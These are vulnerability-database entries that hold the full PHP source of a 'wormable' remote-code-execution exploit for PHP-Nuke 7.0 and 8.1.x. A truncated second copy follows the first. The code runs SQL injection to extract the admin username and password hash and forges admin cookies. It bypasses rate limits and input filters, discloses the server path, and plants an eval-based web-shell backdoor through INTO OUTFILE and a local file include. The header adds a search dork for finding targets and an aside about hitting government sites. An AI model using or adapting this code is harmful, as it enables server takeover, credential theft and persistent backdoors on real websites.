\r\n\r\n } \r\n\r\n //Parses the results from a PHP error to use as a path disclosure. \r\n\r\n function getPath($url,$pops=1){ \r\n\r\n $html=$this->send($url); \r\n\r\n //Regular error reporting: \r\n\r\n $resp=explode("array given in <b>",$html); \r\n\r\n if(isset($resp[1])){ \r\n\r\n $resp = explode("</b>",$resp[1]); \r\n\r\n }else{ \r\n\r\n //xdebug's error reporting: \r\n\r\n $resp=explode("array given in ",$html); \r\n\r\n if(isset($resp[1])){ \r\n\r\n $resp = explode(" ",$resp[1]); \r\n\r\n }else{ \r\n\r\n $resp[0]=false; \r\n\r\n } \r\n\r\n } \r\n\r\n $path=$resp[0]; \r\n\r\n //Can't use dirname() \r\n\r\n if(strstr($path,"\\\\")){ \r\n\r\n $p=explode("\\\\",$path); \r\n\r\n for($x=0;$x<$pops;$x++){ \r\n\r\n array_pop($p); \r\n\r\n } \r\n\r\n $path=implode("\\\\",$p); \r\n\r\n }else{ \r\n\r\n $p=explode("/",$path); \r\n\r\n for($x=0;$x<$pops;$x++){ \r\n\r\n array_pop($p); \r\n\r\n } \r\n\r\n $path=implode("/",$p); \r\n\r\n } \r\n\r\n return $path; \r\n\r\n } \r\n\r\n //Grab the server type from the http header. \r\n\r\n function getServer($url){ \r\n\r\n $resp=$this->send($url); \r\n\r\n $header=explode("Server: ",$resp); \r\n\r\n $server=explode("\\n",$header[1]); \r\n\r\n return $server[0]; \r\n\r\n } \r\n\r\n} \r\n\r\nfunction main(){ \r\n\r\n $user_input=getopt("t:c:a:"); \r\n\r\n if($user_input['t']){ \r\n\r\n $attack_url=$user_input['t']; \r\n\r\n if($user_input['c']){ \r\n\r\n $user_cookie=$user_input['c']; \r\n\r\n } \r\n\r\n //This is only useful for debugging, so its not listed in the useage. \r\n\r\n if($user_input['a']){ \r\n\r\n $admin_cookie=$user_input['a']; \r\n\r\n } \r\n\r\n }else{ \r\n\r\n print("Useage: ./php_exploit -t http://localhost\\n"); \r\n\r\n die("A user's cookie is required for 8.1.35 : ./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\\n"); \r\n\r\n } \r\n\r\n $attack_url=str_replace("index.php","",$attack_url); \r\n\r\n $http=new http_client(); \r\n\r\n $sex=new php_nuke_blind_sql_injection($attack_url."/"); \r\n\r\n if(!$admin_cookie){ \r\n\r\n //This is what a cookie looks like: \r\n\r\n //2:user_name:21232f297a57a5a743894a0e4a801fc3:10::0:0:0:0:DeepBlue:4096 \r\n\r\n //$user_cookie="user=MjphZG1pbjoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzoxMDo6MDowOjA6MDpEZWVwQmx1ZTo0MDk2"; \r\n\r\n if($user_cookie){ \r\n\r\n print "Using cookie...\\n"; \r\n\r\n $http->cookie=$user_cookie; \r\n\r\n //1337+30000 is used as a pivot in parsing, and to test for a sucessful injection. \r\n\r\n //This is NOT Blind SQL Injection, we will be reading the result. This attack works with magic_quotes_gpc on or off. \r\n\r\n $http->postdata="title=wow\\\\&bodytext=/*&mood=".urlencode("'*/,0,0,1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1")."&status=no&submit=Add+New+Entry"; \r\n\r\n $response=$http->send($attack_url."/modules.php?name=Journal&file=savenew"); \r\n\r\n //This part of the exploit is a bit strange sorry for the mess, gotta realease! \r\n\r\n if(strstr($response,"javascript:history.go(-1)")){ \r\n\r\n //magic_quotes_gpc=on \r\n\r\n $http->postdata="title=wow&jbodytext=text&mood=".urlencode("',1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1")."&status=no&submit=Add+New+Entry"; \r\n\r\n $response=$http->send($attack_url."/modules.php?name=Journal&file=savenew"); \r\n\r\n $http->postdata=''; \r\n\r\n //Find the primary key of the journal entry we just created. \r\n\r\n $jid=$http->send($attack_url."/modules.php?name=Journal&file=edit"); \r\n\r\n //we should have the single quote that we escaped at the end of wow' \r\n\r\n $jid=explode("\\">wow<",$jid); \r\n\r\n $jid=explode("jid=", $jid[0]); \r\n\r\n //Check the journal for the admin's username/password hash \r\n\r\n $response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[1]); \r\n\r\n if(strpos($response,"31337")){ \r\n\r\n list($junk,$aid,$pwd)=explode("31337 @ ",$response); \r\n\r\n $aid=explode("<",$aid); \r\n\r\n $pwd=explode("<",$pwd); \r\n\r\n $user_name=$aid[0]; \r\n\r\n $pass_hash=$pwd[0]; \r\n\r\n }else{ \r\n\r\n //magic_quotes_gpc=off \r\n\r\n sleep(3); \r\n\r\n $http->postdata="title=wow\\\\&jbodytext=/*&mood=1&status=".urlencode("no',(select aid from nuke_authors limit 1),(select pwd from nuke_authors limit 1))-- 1")."&submit=Add+New+Entry"; \r\n\r\n $response=$http->send($attack_url."/modules.php?name=Journal&file=savenew"); \r\n\r\n sleep(2); \r\n\r\n $jid=$http->send($attack_url."/modules.php?name=Journal&file=edit"); \r\n\r\n $jid=explode("\\">wow<",$jid); \r\n\r\n $jid=explode("jid=", $jid[0]); \r\n\r\n $jid=explode("\\">",$jid[1]); \r\n\r\n //Check the journal for the admin's username/password hash \r\n\r\n $response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[0]); \r\n\r\n $inj=explode("Last updated on ",$response); \r\n\r\n $inj=explode(" @ ",$inj[1]); \r\n\r\n $pass_hash=$inj[0]; \r\n\r\n $inj=explode("<",$inj[1]); \r\n\r\n $user_name=$inj[0]; \r\n\r\n } \r\n\r\n }else{ \r\n\r\n $http->postdata=''; \r\n\r\n //Find the primary key of the journal entry we just created. \r\n\r\n $jid=$http->send($attack_url."/modules.php?name=Journal&file=edit"); \r\n\r\n //we should have the single quote that we escaped at the end of wow' \r\n\r\n $jid=explode("\\">wow',<",$jid); \r\n\r\n $jid=explode("jid=", $jid[0]); \r\n\r\n //Check the journal for the admin's username/password hash \r\n\r\n $response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[1]); \r\n\r\n if(!strpos($response,"31337")){ \r\n\r\n die("target has patched!\\n"); \r\n\r\n }else{ \r\n\r\n print "Target vulnerable to a privilege escalation attack!!!\\n"; \r\n\r\n list($junk,$aid,$pwd)=explode("31337 @ ",$response); \r\n\r\n $aid=explode("<",$aid); \r\n\r\n $pwd=explode("<",$pwd); \r\n\r\n $user_name=$aid[0]; \r\n\r\n $pass_hash=$pwd[0]; \r\n\r\n } \r\n\r\n } \r\n\r\n }else{ \r\n\r\n $sex->sleep="sleep(5)"; \r\n\r\n print "Starting Attack Against:".$attack_url."/\\n"; \r\n\r\n print "Testing for blind sql injection...\\n"; \r\n\r\n if(!$sex->test_target()){ \r\n\r\n print("Target might be running 8.1.35\\n"); \r\n\r\n print("Try the privilege esciation attack to upload the shell:"); \r\n\r\n die("./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\\n"); \r\n\r\n } \r\n\r\n print "Target is vulnerable to blind sql injection!!!\\n"; \r\n\r\n print "Please Standby For Attack...\\n"; \r\n\r\n $pass_hash=$sex->find_md5("pwd"); \r\n\r\n $user_name=$sex->find_string("aid"); \r\n\r\n print "attacked used:".$sex->request_count." requests.\\n"; \r\n\r\n } \r\n\r\n print "Found Admin's name:".$user_name."\\n"; \r\n\r\n print "Found MD5 Password hash:".$pass_hash."\\n"; \r\n\r\n $admin_cookie="admin=".base64_encode($user_name.":".$pass_hash.":").";"; \r\n\r\n } \r\n\r\n print "Using Admin Session ID:\\n".$admin_cookie."\\n"; \r\n\r\n $http->cookie=$admin_cookie; \r\n\r\n //ipban.php \r\n\r\n sleep(3); \r\n\r\n //This request will tell us what version of php-nuke it is. \r\n\r\n //If it is 8, Then the page gives us configuration information to perserve. \r\n\r\n $admin_options=$http->send($attack_url."/admin.php?op=general"); \r\n\r\n if(!strstr($admin_options,"Content-Length: 0")){ \r\n\r\n print "PHP-Nuke 8 detected.\\n"; \r\n\r\n $option_values=explode("value='",$admin_options); \r\n\r\n $x=0; \r\n\r\n array_shift($option_values); \r\n\r\n //Parsing out and storing configuration values to restore them after the hack. \r\n\r\n foreach( $option_values as $value){ \r\n\r\n $value=explode("'",$value); \r\n\r\n $values[]=urlencode($value[0]); \r\n\r\n if($x++==4) \r\n\r\n break; \r\n\r\n } \r\n\r\n //ipban.php \r\n\r\n sleep(2); \r\n\r\n //Enable error reporting \r\n\r\n $http->postdata="xsitename=".$values[0]."&xnukeurl=".$values[1]."&xslogan=".$values[2]."&xstartdate=".$values[3]."&xadmingraphic=".$values[4]."&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=1&op=savegeneral"; \r\n\r\n $error_reporting=$http->send($attack_url."/admin.php"); \r\n\r\n //Path diclosure in add_pwd. We will trigger a warning by passing md5() the array add_pwd[]. \r\n\r\n $http->postdata="add_name=junk&add_aid=junk&add_email=junk&add_url=junk&add_admlanguage=&auth_modules%5B%5D=23&add_radminsuper=1&add_pwd[]=junk&op=AddAuthor"; \r\n\r\n $remote_path=$http->getPath($attack_url."/admin.php",3); \r\n\r\n sleep(2); \r\n\r\n if(strstr($remote_path,':\\\\')){ \r\n\r\n print "Windows box detected.\\n"; \r\n\r\n print "Remote path:$remote_path\\n"; \r\n\r\n print "Uploading backdoor...\\n"; \r\n\r\n $remote_path=addslashes(addslashes($remote_path."\\\\frontend.php")); \r\n\r\n $backdoor='get_magic_quotes_gpc()?eval(stripslashes($_GET["e"])):eval($_GET["e"])'; \r\n\r\n //Could have used a concat but php-nuke filters for it. This hides <> from the xss filter. \r\n\r\n //union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php \r\n\r\n $http->postdata="chng_uid=".urlencode("' union/**/ select ".$sex->charEncode("<?php").",'".$backdoor."',".$sex->charEncode("?>").",'','','','','','','','','','','','','','','' into outfile '".$remote_path."'-- 1"); \r\n\r\n $re=$http->send($attack_url."/admin.php?op=modifyUser"); \r\n\r\n //Disable error reporting \r\n\r\n $http->postdata="xsitename=".$values[0]."&xnukeurl=".$values[1]."&xslogan=".$values[2]."&xstartdate=".$values[3]."&xadmingraphic=".$values[4]."&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=0&op=savegeneral"; \r\n\r\n $error_reporting=$http->send($attack_url."/admin.php"); \r\n\r\n }else{ \r\n\r\n print "*nix box detected.\\n"; \r\n\r\n print "Remote path:$remote_path\\n"; \r\n\r\n //Is mysql on the same machine as the httpd? \r\n\r\n sleep(2); \r\n\r\n $http->postdata="chng_uid=".urlencode("' or 1=(select if(substring(load_file('".$remote_path."/index.php'),1,1)='<',0,1))-- 1"); \r\n\r\n $mysql_check=$http->send($attack_url."/admin.php?op=modifyUser"); \r\n\r\n if(strstr($mysql_check,"User Doesn't Exists!")){ \r\n\r\n print("MySQL isn't on the same machine or you do not have file privileges.\\n"); \r\n\r\n die("Remote code execution failed\\n"); \r\n\r\n } \r\n\r\n print "Uploading backdoor...\\n"; \r\n\r\n //ipban.php \r\n\r\n sleep(2); \r\n\r\n //Grab the theme, this is needed to repair the database after the LFI \r\n\r\n $theme=$http->send($attack_url."/admin.php?op=themes"); \r\n\r\n $theme=explode('src="themes/',$theme); \r\n\r\n $theme=explode('/images/',$theme[1]); \r\n\r\n //Repair the database after the LFI. \r\n\r\n $backdoor_installer='function OpenTable(){} function themeheader(){} $db->sql_query("update ".$prefix."_config set Default_Theme='.$sex->charEncode($theme[0]).', display_errors=0");'; \r\n\r\n //This is a magic_quotes_gpc and mysql safe backdoor that fits on one line. \r\n\r\n $backdoor='get_magic_quotes_gpc()?eval(stripslashes(".chr(36)."_GET[".chr(34)."e".chr(34)."])):eval(".chr(36)."_GET[".chr(34)."e".chr(34)."])'; \r\n\r\n //Install the backdoor in a relitive directory. \r\n\r\n $backdoor_installer.='file_put_contents($_SERVER["DOCUMENT_ROOT"].dirname($_SERVER["SCRIPT_NAME"])."/frontend.php",chr(60)."?php '.$backdoor.'?".chr(62));'; \r\n\r\n //charEncode is used to bypass XSS filters. \r\n\r\n //union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php \r\n\r\n $http->postdata="chng_uid=".urlencode("' union/**/ select ".$sex->charEncode("<?php").",'".$backdoor_installer."',".$sex->charEncode("?>").",'','','','','','','','','','','','','','','' into outfile '/tmp/theme.php'-- 1"); \r\n\r\n $http->send($attack_url."/admin.php?op=modifyUser"); \r\n\r\n sleep(2); \r\n\r\n //local file include vulnerablity to execute /tmp/theme.php \r\n\r\n $http->postdata="xDefault_Theme=../../../../../../../../../../../tmp&xoverwrite_theme=0&op=savethemes"; \r\n\r\n $http->send($attack_url."/admin.php"); \r\n\r\n sleep(2); \r\n\r\n $http->postdata=''; \r\n\r\n //Fire off a get request to trigger the uploaded php file using LFI \r\n\r\n $http->send($attack_url); \r\n\r\n sleep(2); \r\n\r\n //Try the LFI again, just in case. \r\n\r\n $http->send($attack_url."/admin.php"); \r\n\r\n } \r\n\r\n sleep(2); \r\n\r\n //test if the backdoor works, try and clean up after the exploit. \r\n\r\n $test_backdoor=$http->send($attack_url."/frontend.php?e=".urlencode("echo 31337;unlink('/tmp/theme.php');system('rm /tmp/theme.php');")); \r\n\r\n if(strstr($test_backdoor,"31337")){ \r\n\r\n print "Remote Code execution tested successfully:\\n".$attack_url."/frontend.php?e=phpinfo()".urlencode(';')."\\n"; \r\n\r\n }else{ \r\n\r\n print "Backdoor install failed!\\n"; \r\n\r\n } \r\n\r\n }else{ \r\n\r\n ////PHP-Nuke 7.0 Remote Code Execution Exploit using CVE-2004-1315 which affects the phpBB 2.0.6 module. \r\n\r\n print "PHP-Nuke 7 detected.\\n"; \r\n\r\n $http->postdata="";//send get requests. \r\n\r\n //Fire off a check for CVE-2004-1315, phpbb maybe installed. \r\n\r\n //This is more like the oringal CVE-2004-1315: %2527.printf(20041315).%2527 \r\n\r\n //php-nuke was not vulnerable to this because of mainfile line 50: \\([^>]*"?[^)]*\\) \r\n\r\n //to byapss this check double urlencode the parren () %2527.printf%252820041315%2529.%2527 \r\n\r\n $try_exploit=$http->send($attack_url."/modules.php?name=Forums&file=viewtopic&t=1&highlight=%2527.printf%252820041315%2529.%2527"); \r\n\r\n //if the exploit didn't work, then we might have to enable phpbb and populate it. \r\n\r\n if(!strstr($try_exploit,"20041315")){ \r\n\r\n //Enalbe PHPBB \r\n\r\n $http->send($attack_url."/admin.php?op=module_status&mid=22&active=1"); \r\n\r\n //create a new category for phpbb \r\n\r\n $http->postdata="mode=addcat&categoryname=test&addcategory=Create+new+category"; \r\n\r\n $t=$http->send($attack_url."/modules/Forums/admin/admin_forums.php"); \r\n\r\n?>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-19573", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T18:12:02", "description": "No description provided by source.", "published": "2010-05-05T00:00:00", "type": "seebug", "title": "Wormable Remote Code Execution in PHP-Nuke 7.0/8.1/8.1.35", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-1315"], "modified": "2010-05-05T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-19556", "id": "SSV:19556", "sourceData": "\n #!/usr/bin/php\r\n<?php\r\n/*******************************************************************************\r\nWormable Remote Code Execution in PHP-Nuke 7.0/8.1/8.1.35(newist as of release)\r\nVendor's Website:http://phpnuke.org/\r\nSecuirty Researcher: Michael Brooks (https://sitewat.ch)\r\nOriginal Advisory: http://blog.sitewat.ch/2010/05/vulnerabilities-in-php-nuke.html\r\n \r\nGoogle hack:\r\n"Francisco Burzi" "Page Generation:" Seconds inurl:modules.php\r\n1,170,000 results\r\nadd inurl:gov to the google hack if you want to make the news ;)\r\nWorks with maigic_quotes_gpc=On or Off\r\nWorks with AppArmor and Suhosin Hadend-PHP, tested on Ubuntu 9.04 and 10.04\r\nMy own LFI+SQLI attack is used to bypass AppArmor!\r\nAlso tested XAMPP on Windows XP\r\nAll tests where done with MySQL5 and PHP5\r\nTo obtain a user's cookie:\r\n1) Register a normal account\r\n2) Login\r\n3) Type this into the same address bar and hit enter: javascript:document.cookie\r\nTo set a cookie you can do use this: javascript:document.cookie="admin=MjphZG1pbjoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzoxMDo6MDowOjA6MDpEZWVwQmx1ZTo0MDk2"\r\n*******************************************************************************/\r\nset_time_limit(0);\r\n//The blind_sql_injeciton calss is a general exploit framework that we are inheriting.\r\nclass php_nuke_blind_sql_injection extends blind_sql_injection {\r\n //This is the blind sql injection request.\r\n function query($check){\r\n //Rate limiter to bypass ipban.php's protection.\r\n //Must stay below 5 requests every 2 seconds.\r\n if(!($this->request_count%4)){\r\n sleep(2);\r\n }\r\n //build the http request to Inject a query:\r\n //This is a simple get request with a custom referer\r\n //$this->set_referer("'="/\\*" (select ".$check." from nuke_authors limit 1))-- */");\r\n $this->set_referer("'=(select ".$check." from nuke_authors limit 1))-- 1");\r\n /*example get and post request.\r\n *$this->set_get("id=1 or (select ".$check." from nuke_authors limit 1))";//$_GET[id]\r\n *$this->set_post("id=1 or (select ".$check." from nuke_authors limit 1))");//$_POST[id]\r\n */\r\n }\r\n}\r\n//This is a very efficient blind sql injection class.\r\nclass blind_sql_injection{\r\n var $url, $backup_url, $result, $http, $request_count, $timeout;\r\n function blind_sql_injection($url,$timeout=10){\r\n $this->request_count=0;\r\n $this->url=$url;\r\n $this->backup_url=$url;\r\n $this->http=new http_client();\r\n $this->timeout=$timeout;\r\n }\r\n function set_get($get){\r\n $this->url=$this->url."?".$get;\r\n }\r\n function set_referer($referer){\r\n $this->http->referer=$referer;\r\n }\r\n function set_post($post){\r\n $this->http->postdata=$post;\r\n }\r\n function test_target(){\r\n return $this->send("if(true,sleep(".$this->timeout."),0)")&&!$this->send("if(false,sleep(".$this->timeout."),0)");\r\n }\r\n function num_to_hex($arr){\r\n $ret='';\r\n foreach($arr as $a){\r\n if($a<=9){\r\n $ret.=$a;\r\n }else{\r\n $ret.=chr(87+$a);\r\n }\r\n }\r\n return $ret;\r\n }\r\n //Looking for a string of length 32 and base 16 in ascii chars.\r\n function find_md5($column){\r\n return $this->num_to_hex($this->bin_finder(16,32,"conv(substring($column,%s,1),16,10)"));\r\n }\r\n function find_sha1($column){\r\n return $this->num_to_hex($this->bin_finder(16,40,"conv(substring($column,%s,1),16,10)"));\r\n }\r\n //Look for an ascii string of arbitrary length.\r\n function find_string($column){\r\n $ret='';\r\n //A length of zero means we are looking for a null byte terminated string.\r\n $result=$this->bin_finder(128,0,"ascii(substring($column,%s,1))");\r\n foreach($result as $r){\r\n $ret.=chr($r);\r\n }\r\n return $ret;\r\n }\r\n //query() is a method that generates the sql injection request\r\n function query($check){\r\n //This function must be overridden.\r\n }\r\n function recheck($result,$question,$base){\r\n $this->bin_finder($base,1,$question,$start);\r\n //Force a long timeout.\r\n $tmp_timeout=$this->timeout;\r\n if($this->timeout<10){\r\n $this->timeout=10;\r\n }else{\r\n $this->timeout=$this->timeout*2;\r\n }\r\n $l=1;\r\n foreach($result as $r){\r\n if($this->send("if(".sprintf($question,$l)."!=".$r.",sleep(".$this->timeout."),0)")){\r\n $result[]=$b;\r\n break;\r\n }\r\n $l++;\r\n }\r\n $this->timeout=$tmp_timeout;\r\n }\r\n function linear_finder($base,$length,$question){\r\n for($l=1;$l<=$length;$l++){\r\n for($b=0;$b<$base;$b++){\r\n if($this->send("if(".sprintf($question,$l)."=".$b.",sleep(".$this->timeout."),0)")){\r\n $result[]=$b;\r\n break;\r\n }\r\n }\r\n }\r\n }\r\n #Binary search for mysql based sql injection.\r\n function bin_finder($base,$length,$question){\r\n $start_pos=1;\r\n $result='';\r\n for($cur=$start_pos;$cur<=$length||$length==0;$cur++){\r\n $n=$base-1;\r\n $low=0;\r\n $floor=$low;\r\n $high=$n-1;\r\n $pos= $low+(($high-$low)/2);\r\n $found=false;\r\n while($low<=$high&&!$found){\r\n #asking the sql database if the current value is greater than $pos\r\n if($this->send("if(greatest(".sprintf($question,$cur).",".$pos.")!=".$pos.",sleep(".$this->timeout."),0)")){\r\n #if this is true then the value must be the modulus.\r\n if($pos==$n-1){\r\n $result[]=$pos+1;\r\n $found=true;\r\n }else{\r\n $low=$pos+1;\r\n }\r\n #asking the sql database if the current value is less than $pos\r\n }else if($this->send("if(least(".sprintf($question,$cur).",".$pos.")!=".$pos.",sleep(".$this->timeout."),0)")){\r\n #if this is true the value must be zero, or in the case of ascii, a null byte.\r\n if($pos==$floor+1){\r\n $found=true;\r\n #We have found the null terminator so we have finnished our search for a string.\r\n if($length==0){\r\n $length=-1;\r\n }else{\r\n $result[]=$pos-1;\r\n }\r\n }else{\r\n $high=$pos-1;\r\n }\r\n }else{\r\n #both greater than and less then where asked, so so then the answer is our guess $pos.\r\n $result[]=$pos;\r\n $found=true;\r\n }\r\n $pos=$low+(($high-$low)/2);\r\n }\r\n print(".");\r\n }\r\n return $result;\r\n }\r\n //Fire off the request\r\n function send($quesiton){\r\n //build the injected query.\r\n $this->query($quesiton);\r\n $start=time();\r\n $resp=$this->http->send($this->url);\r\n //backup_url is for set_get()\r\n $this->url=$this->backup_url;\r\n $this->request_count++;\r\n return (time()-$start>=$this->timeout);\r\n }\r\n //retroGod RIP\r\n function charEncode($string){\r\n $char="char(";\r\n $size=strlen($string);\r\n for($x=0;$x<$size;$x++){\r\n $char.=ord($string[$x]).",";\r\n }\r\n $char[strlen($char)-1]=")%00";\r\n return $char;\r\n }\r\n}\r\n//General purpose http client that works on a default php install.\r\nclass http_client{\r\n var $proxy_ip='', $proxy_port='', $proxy_name='', $proxy_pass='', $referer='',$cookie='',$postdata='';\r\n function send($loc){\r\n //overload function polymorphism between gets and posts\r\n $url=parse_url($loc);\r\n if(!isset($url['port'])){\r\n $url['port']=80;\r\n }\r\n $ua='Firefox';\r\n if($this->proxy_ip!=''&&$this->proxy_port!=''){\r\n $fp = pfsockopen( $this->proxy_ip, $this->proxy_port, &$errno, &$errstr, 120 );\r\n $url['path']=$url['host'].':'.$url['port'].$url['path'];\r\n }else{\r\n $fp = fsockopen( $url['host'], $url['port'], &$errno, &$errstr, 120 );\r\n }\r\n if( !$fp ) {\r\n print "$errstr ($errno)<br>\\nn";\r\n return false;\r\n } else {\r\n if( $this->postdata=='' ) {\r\n $request="GET ".$url['path']."?".$url['query']." HTTP/1.1\\r\\n";\r\n } else {\r\n $request="POST ".$url['path']."?".$url['query']." HTTP/1.1\\r\\n";\r\n }\r\n if($this->proxy_name!=''&&$this->proxy_pass!=''){\r\n $request.="Proxy-Authorization: Basic ".base64_encode($this->proxy_name.":".$this->proxy_pass)."\\r\\n\\r\\n";\r\n }\r\n $request.="Host: ".$url['host'].":".$url['port']."\\r\\n";\r\n $request.="User-Agent: ".$ua."\\r\\n";\r\n $request.="Accept: text/plain\\r\\n";\r\n if($this->referer!=''){\r\n $request.="Referer: ".$this->referer."\\r\\n";\r\n }\r\n $request.="Connection: Close\\r\\n";\r\n if($this->cookie!=''){\r\n $request.="Cookie: ".$this->cookie."\\r\\n" ;\r\n }\r\n if( $this->postdata!='' ) {\r\n $strlength = strlen( $this->postdata );\r\n $request.="Content-type: application/x-www-form-urlencoded\\r\\n" ;\r\n $request.="Content-length: ".$strlength."\\r\\n\\r\\n";\r\n $request.=$this->postdata;\r\n }\r\n fputs( $fp, $request."\\r\\n\\r\\n" );\r\n while( !feof( $fp ) ) {\r\n $output .= fgets( $fp, 1024 );\r\n }\r\n fclose( $fp );\r\n //php_nuke only:\r\n if(strstr($output,"too many page loads")){\r\n print "REQUEST CAP HIT!\\n";\r\n print_r(debug_backtrace());\r\n print "REQUEST CAP HIT!\\n";\r\n die();\r\n }\r\n return $output;\r\n }\r\n }\r\n //Use a http proxy\r\n function proxy($proxy){ //user:pass@ip:port\r\n $proxyAuth=explode('@',$proxy);\r\n if(isset($proxyAuth[1])){\r\n $login=explode(':',$proxyAuth[0]);\r\n $this->proxy_name=$login[0];\r\n $this->proxy_pass=$login[1];\r\n $addr=explode(':',$proxyAuth[1]);\r\n }else{\r\n $addr=explode(':',$proxy);\r\n }\r\n $this->proxy_ip=$addr[0];\r\n $this->proxy_port=$addr[1];\r\n }\r\n //Parses the results from a PHP error to use as a path disclosure.\r\n function getPath($url,$pops=1){\r\n $html=$this->send($url);\r\n //Regular error reporting:\r\n $resp=explode("array given in <b>",$html);\r\n if(isset($resp[1])){\r\n $resp = explode("</b>",$resp[1]);\r\n }else{\r\n //xdebug's error reporting:\r\n $resp=explode("array given in ",$html);\r\n if(isset($resp[1])){\r\n $resp = explode(" ",$resp[1]);\r\n }else{\r\n $resp[0]=false;\r\n }\r\n }\r\n $path=$resp[0];\r\n //Can't use dirname()\r\n if(strstr($path,"\\\\")){\r\n $p=explode("\\\\",$path);\r\n for($x=0;$x<$pops;$x++){\r\n array_pop($p);\r\n }\r\n $path=implode("\\\\",$p);\r\n }else{\r\n $p=explode("/",$path);\r\n for($x=0;$x<$pops;$x++){\r\n array_pop($p);\r\n }\r\n $path=implode("/",$p);\r\n }\r\n return $path;\r\n }\r\n //Grab the server type from the http header.\r\n function getServer($url){\r\n $resp=$this->send($url);\r\n $header=explode("Server: ",$resp);\r\n $server=explode("\\n",$header[1]);\r\n return $server[0];\r\n }\r\n}\r\nfunction main(){\r\n $user_input=getopt("t:c:a:");\r\n if($user_input['t']){\r\n $attack_url=$user_input['t'];\r\n if($user_input['c']){\r\n $user_cookie=$user_input['c'];\r\n }\r\n //This is only useful for debugging, so its not listed in the useage.\r\n if($user_input['a']){\r\n $admin_cookie=$user_input['a'];\r\n }\r\n }else{\r\n print("Useage: ./php_exploit -t http://localhost\\n");\r\n die("A user's cookie is required for 8.1.35 : ./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\\n");\r\n }\r\n $attack_url=str_replace("index.php","",$attack_url);\r\n $http=new http_client();\r\n $sex=new php_nuke_blind_sql_injection($attack_url."/");\r\n if(!$admin_cookie){\r\n //This is what a cookie looks like:\r\n //2:user_name:21232f297a57a5a743894a0e4a801fc3:10::0:0:0:0:DeepBlue:4096\r\n //$user_cookie="user=MjphZG1pbjoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzoxMDo6MDowOjA6MDpEZWVwQmx1ZTo0MDk2";\r\n if($user_cookie){\r\n print "Using cookie...\\n";\r\n $http->cookie=$user_cookie;\r\n //1337+30000 is used as a pivot in parsing, and to test for a sucessful injection.\r\n //This is NOT Blind SQL Injection, we will be reading the result. This attack works with magic_quotes_gpc on or off.\r\n $http->postdata="title=wow\\\\&bodytext=/*&mood=".urlencode("'*/,0,0,1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1")."&status=no&submit=Add+New+Entry";\r\n $response=$http->send($attack_url."/modules.php?name=Journal&file=savenew");\r\n //This part of the exploit is a bit strange sorry for the mess, gotta realease!\r\n if(strstr($response,"javascript:history.go(-1)")){\r\n //magic_quotes_gpc=on\r\n $http->postdata="title=wow&jbodytext=text&mood=".urlencode("',1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1")."&status=no&submit=Add+New+Entry";\r\n $response=$http->send($attack_url."/modules.php?name=Journal&file=savenew");\r\n $http->postdata='';\r\n //Find the primary key of the journal entry we just created.\r\n $jid=$http->send($attack_url."/modules.php?name=Journal&file=edit");\r\n //we should have the single quote that we escaped at the end of wow'\r\n $jid=explode("\\">wow<",$jid);\r\n $jid=explode("jid=", $jid[0]);\r\n //Check the journal for the admin's username/password hash\r\n $response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[1]);\r\n if(strpos($response,"31337")){\r\n list($junk,$aid,$pwd)=explode("31337 @ ",$response);\r\n $aid=explode("<",$aid);\r\n $pwd=explode("<",$pwd);\r\n $user_name=$aid[0];\r\n $pass_hash=$pwd[0];\r\n }else{\r\n //magic_quotes_gpc=off\r\n sleep(3);\r\n $http->postdata="title=wow\\\\&jbodytext=/*&mood=1&status=".urlencode("no',(select aid from nuke_authors limit 1),(select pwd from nuke_authors limit 1))-- 1")."&submit=Add+New+Entry";\r\n $response=$http->send($attack_url."/modules.php?name=Journal&file=savenew");\r\n sleep(2);\r\n $jid=$http->send($attack_url."/modules.php?name=Journal&file=edit");\r\n $jid=explode("\\">wow<",$jid);\r\n $jid=explode("jid=", $jid[0]);\r\n $jid=explode("\\">",$jid[1]);\r\n //Check the journal for the admin's username/password hash\r\n $response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[0]);\r\n $inj=explode("Last updated on ",$response);\r\n $inj=explode(" @ ",$inj[1]);\r\n $pass_hash=$inj[0];\r\n $inj=explode("<",$inj[1]);\r\n $user_name=$inj[0];\r\n }\r\n }else{\r\n $http->postdata='';\r\n //Find the primary key of the journal entry we just created.\r\n $jid=$http->send($attack_url."/modules.php?name=Journal&file=edit");\r\n //we should have the single quote that we escaped at the end of wow'\r\n $jid=explode("\\">wow',<",$jid);\r\n $jid=explode("jid=", $jid[0]);\r\n //Check the journal for the admin's username/password hash\r\n $response=$http->send($attack_url."/modules.php?name=Journal&file=display&jid=".$jid[1]);\r\n if(!strpos($response,"31337")){\r\n die("target has patched!\\n");\r\n }else{\r\n print "Target vulnerable to a privilege 